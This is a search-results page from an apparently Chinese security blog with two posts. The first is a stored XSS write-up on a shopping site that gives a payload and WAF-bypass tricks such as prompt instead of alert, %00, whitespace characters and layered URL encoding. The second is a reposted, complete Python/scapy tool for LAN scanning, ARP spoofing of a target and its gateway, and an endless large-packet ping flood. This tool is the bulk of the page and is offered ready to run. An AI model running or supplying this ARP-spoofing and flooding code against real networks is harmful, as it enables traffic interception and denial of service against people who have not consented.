搜索到
2
篇与
陈sir
的结果
-
![记录某商城存在xss存储型xss- 陈sir讲安全]()
记录某商城存在xss存储型xss- 陈sir讲安全 我也是第一次写技术类文章,下面看看漏洞情况吧我在是在详细地址插入的语句插入一条” onclick=”alert(11)然后我们看效果当点击详细地址这个框的时候就会触发弹窗,接下来我们看看源码是什么情况他对双引号没转意,也没对弹窗函数和括号进行转意复现到这里也就结束了!这个漏洞我以上报CNVD,并且已经修复,只可惜给我10个积分.唉下面总结一下吧怎样去测xss漏洞了?1,先随便输入几个数字和字母,然后去HTML源码里去找,看哪里出现了你输入的东西不要只找到一个就不找了.2.不要一看见框就直接插入xss语句,我们要先看他对啥转意,比如输入888’,888”,88& 888<>,888()这些东西去看有没有过滤1,有人会问为啥要先输入几个字符,去看看在源码里是否有,因为这样做的话可以为你找很多条路,如果你找到了一个它是被双引号或者被单引号包住了,然后网站又过滤单双引号了,而你又不知道下面还有是被尖阔号所包含,恰巧网站对尖扩号没有过滤,你是不是吧以漏洞擦肩而过2,那又有人会问为啥不直接插xss语句,那好,如果一个网站啥特殊符号都过滤基本都不存在xss漏洞,你一条一条的插不浪费时间?,你要先弄清楚他过滤啥东西,好对症下药下我给出绕过过滤的几个小技巧巧妙使用他们由于我给出的转意符,编辑器直接给我转了所以我给大家截了图如果“alert”被拉黑了咋办,那当然是用“prompt”这函数照样可以弹窗如果“alert”被拉黑了我也是可以用%00来欺骗waf的如果有些函数被拉黑了还可以使用制表符, 换行符和回车符我也贴出来由于我给出的制表符, 换行符和回车符,编辑器直接给我转了所以我给大家截了图我们还可以给一些特殊符号进行URL编码(有的编一层就过了,有的需要多遍几层,但是有的咋遍多不会过)切记总之找漏洞不要太死板活一点 -
![python实现ARP攻击]()
python实现ARP攻击 from scapy.all import * import threading import socket import uuid import time import os intro = ''' ┌─────────────────────────────────────────────┐ │ pressure cooker │ ├─────────────────────────────────────────────┤ │ function │ │ [h] Host scan │ │ [o] Host spoofing │ │ [p] Death Ping │ │ expect ! │ ├─────────────────────────────────────────────┤ │ Author:CentOS NACA │ └─────────────────────────────────────────────┘ ''' def ping(attackIP): count = 1 while True: cmd = "ping %s -l 65500" % attackIP print(cmd) result = os.system(cmd) print(result) print("Sent", count) count += 1 def gateway_mac_1(gateway_ip): try: gateway_mac_2 = getmacbyip(gateway_ip) return gateway_mac_2 except(): print('[-]请检查网关MAC是否存活') def get_mac(Target_IP): try: tgtMac = getmacbyip(Target_IP) return tgtMac except(): print('[-]请检查目标IP是否存活') def get_mac_address(): mac = uuid.UUID(int=uuid.getnode()).hex[-12:] return ":".join([mac[e:e + 2] for e in range(0, 11, 2)]) def host_discovery(host_computer): IpScan = host_computer + '/24' try: ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF") / ARP(pdst=IpScan), timeout=2) except Exception as opp: print(opp) else: print("[%d] LAN survived" % (len(ans))) print(" MAC address IP address") print(" ") for send, rcv in ans: ListMACAddr = rcv.sprintf("%Ether.src% ----------- %ARP.psrc%") print(ListMACAddr) def host_arp_spoofing(native_mac, target_mac, gateway_ip, Target_ip): data_packet = Ether(src=native_mac, dst=target_mac) / ARP(hwsrc=native_mac, psrc=gateway_ip, hwdst=target_mac, pdst=Target_ip, op=2) return data_packet def gateway_arp_spoofing(native_mac, gateway_mac, gateway_ip, Target_ip): data_packet = Ether(src=native_mac, dst=gateway_mac) / ARP(hwsrc=native_mac, psrc=Target_ip, hwdst=gateway_mac, pdst=gateway_ip, op=2) return data_packet def main(): print(intro) print("\033[1;32mSelect mode!\033[0m") pattern = input('\033[1;31m[*]\033[0m==>') if pattern == 'h': print('Please enter local v4ip') host_computer = input("\033[1;31m[*]\033[0m==>") wait_a_moment = input("\033[1;31m[.....]\033[0m press any key to continue") host_discovery(host_computer) if pattern == 'o': try: native_mac = get_mac_address() # 本机Mac地址 print("Enter the ip address of the target") # 目标ip地址 Target_ip = input("\033[1;31m[*]\033[0m==>") target_mac = get_mac(Target_ip) # ip转Mac地址 print("Enter the IP address of the gateway") # 网关IP地址 gateway_ip = input("\033[1;31m[*]\033[0m==>") gateway_mac = gateway_mac_1(gateway_ip) # 网关Mac地址 print("The local MAC address is:", native_mac) print("The MAC address of the target computer is:", target_mac) print("The gateway IP address is:", gateway_ip) print("The gateway MAC address is:", gateway_mac) except(): print("\033[1;31m[!]\033[0mPlease enter the correct parameters") try: print("Number of ARP attacks launched") frequency = input("Unlimited attack [y/n] default[n]") implement = host_arp_spoofing(native_mac, target_mac, gateway_ip, Target_ip) gateway = gateway_arp_spoofing(native_mac, gateway_mac, gateway_ip, Target_ip) if frequency == 'y': wait_a_moment_1 = input("\033[1;31m[.....]\033[0m press any key to continue") count = 1 while True: thread = threading.Thread(target=sendp, args=(implement,)) thread.start() thread.join() print("\033[1;36mSend [%d] computer ARP Spoofing packet\033[0m" % count) thread_q = threading.Thread(target=sendp, args=(gateway,)) thread_q.start() thread.join() print("Send [%d] gateway ARP Spoofing packet" % count) count += 1 count_1 = 1 if frequency == 'n': wait_a_moment_2 = input("\033[1;31m[.....]\033[0m press any key to continue") Setting_times = input("\033[1;31m[+]\033[0mEnter the number of cycles==>") for loop in range(int(Setting_times)): thread = threading.Thread(target=sendp, args=(implement,)) thread.start() thread.join() print("\033[1;36mSend [%d] computer ARP Spoofing packet\033[0m" % count_1) thread_q = threading.Thread(target=sendp, args=(gateway,)) thread_q.start() thread.join() print("Send [%d] gateway ARP Spoofing packet" % count_1) count_1 += 1 except(): print('\033[1;31m[!]\033[0mPlease select the correct mode') if pattern == 'p': attackIP = input("\033[1;31m[*]\033[0Attack IP address===>") wait_a_moment_2 = input("\033[1;31m[.....]\033[0m press any key to continue") ping(attackIP) if __name__ == '__main__': main() ————————————————版权声明:本文为CSDN博主「retuen」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/retuen/article/details/108918668
